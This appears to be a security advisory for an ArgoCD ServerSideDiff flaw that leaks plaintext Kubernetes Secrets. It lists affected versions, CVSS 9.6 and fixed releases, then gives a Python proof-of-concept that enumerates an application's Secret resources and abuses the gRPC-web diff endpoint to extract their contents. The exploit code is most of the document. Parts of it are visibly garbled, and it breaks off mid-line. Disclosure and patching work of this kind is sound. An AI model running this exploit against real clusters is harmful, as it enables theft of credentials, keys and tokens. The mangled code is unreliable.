# Kubernetes Secret Extraction via ArgoCD ServerSideDiff ## Vulnerability Overview The `ServerSideDiff` endpoint in ArgoCD suffers from missing authorization and data masking vulnerabilities. Attackers with read-only access to Kubernetes Secret data can extract plaintext Secret data by leveraging the Kubernetes API server's Server-Side Apply dry-run mechanism. ## Affected Versions - **Affected Versions**: `github.com/argoproj/argo-cd/v3` (Go) 3.2.0 - 3.3.8 - **Fixed Versions**: 3.3.9, 3.2.11 - **CVSS Score**: 9.6 / 10 (Critical) - **Attack Vector**: Network - **Attack Complexity**: Low - **Privileges Required**: Low - **User Interaction**: None - **Scope**: Changed - **Confidentiality**: High - **Integrity**: High - **Availability**: None ## Remediation Upgrade to the fixed versions: - `3.3.9` - `3.2.11` ## POC Code ```python #!/usr/bin/env python3 """ Argo CD ServerSideDiff Secret Extraction PoC Usage: python3 poc.py Example: python3 poc.py argocd.int..com ey2b6d... my-app my-project """ import base64 import http.client import json import struct import sys import urllib.parse from collections import defaultdict def encode_varint(v): out = [] while v > 0x7f: out.append((v & 0x7f) | 0x80) v >>= 7 out.append(v & 0x7f) return bytes(out) def encode_str(field, val): tag = (field > 3].append(val) elif wtype == 2: length, pos = decode_varint(data, pos) fields[tag >> 3].append(data[pos:pos + length]) pos += length elif wtype == 5: fields[tag >> 3].append(data[pos:pos + 4]) pos += 4 elif wtype == 1: fields[tag >> 3].append(data[pos:pos + 8]) pos += 8 else: break return dict(fields) # -- grpc-web framing -- def grpc_frame(payload): return b"\x00\x00\x00\x00\x01" + struct.pack(">I", len(payload)) + payload def decode_grpc_frames(data): frames, pos = [], 0 while pos + 5 I", data[pos+1:pos+5])[0] pos += 5 frames.append((flag, data[pos:pos+length])) pos += length return frames # -- http helpers -- def make_conn(host): import ssl ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE return http.client.HTTPSConnection(host, 443, context=ctx, timeout=10) def rest_get(conn, path, token): conn.request("GET", path, headers={ "Authorization": "Bearer " + token, "Accept": "application/json", }) resp = conn.getresponse() body = resp.read() if resp.status != 200: return None, "HTTP %d %s" % (resp.status, body) return json.loads(body), None def grpc_post(conn, token, payload): conn.request("POST", "/application.ApplicationService/ServerSideDiff", body=grpc_frame(payload), headers={ "Content-Type": "application/grpc-web+proto", "Accept": "application/grpc-web+proto", "x-grpc-web": "1", "Authorization": "Bearer " + token, }) resp = conn.getresponse() raw = resp.read() if resp.status != 200: return None, "HTTP %d %s" % (resp.status, raw) frames = decode_grpc_frames(raw) for flag, data in frames: if flag == 0: return data, None return None, "no data frame in response" # -- main -- def main(): if len(sys.argv) != 5: print("Usage: python3 poc.py ") sys.exit(1) host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4] conn = make_conn(host) # step 1: list managed resources for the app, find secrets print("[*] Fetching managed resources for %s/%s..." % (project, app_name)) data, err = rest_get(conn, "/api/v1/applications/%s/managed-resources" % urllib.parse.quote(app_name), token) if err: print("[!] Failed: %s" % err); sys.exit(1) secrets = [] for r in data.get("items", []): if r.get("kind") != "Secret": continue name = r.get("name", "") ns = r.get("namespace", "") live = r.get("liveState", "") stype = "Opaque" if live and live != "null": try: stype = json.loads(live).get("type", "Opaque") except Exception: pass secrets.append((name, ns, stype, live)) if not secrets: print("[!] No secrets found in managed resources"); sys.exit(0) print("[+] Found %d secrets" % len(secrets)) # step 2: call ServerSideDiff for each secret total_extracted = 0 for sname, sns, stype, live_json in secrets: # build minimal target manifest (no data field) target = json.dumps({ "apiVersion": "v1", "kind": "Secret", "metadata": {"name": sname, "namespace": sns}, "type": stype }) # copy required annotations from live state for SA tokens if live_json and live_json != "null": try: live_annots = json.loads(live_json).get("metadata", {}).get("annotations", {}) k8s_annots = {k: v for k, v in live_annots.items() if k.startswith("kubernetes.io/")} if k8s_annots: target_obj = json.loads(target) target_obj["metadata"]["annotations"] = k8s_annots target = json.dumps(target_obj) except Exception: pass # for TLS secrets, include required placeholder fields if stype == "kubernetes.io/tls": target_obj = json.loads(target) target_obj["data"] = { "tls.crt": base64.b64encode(b"PLACEHOLDER").decode(), "tls.key": base64.b64encode(b"PLACEHOLDER").decode(), } target = json.dumps(target_obj) elif stype == "kubernetes.io/dockerconfigjson": target_obj = json.loads(target) target_obj["data"] = {"dockerconfigjson": base64.b64enc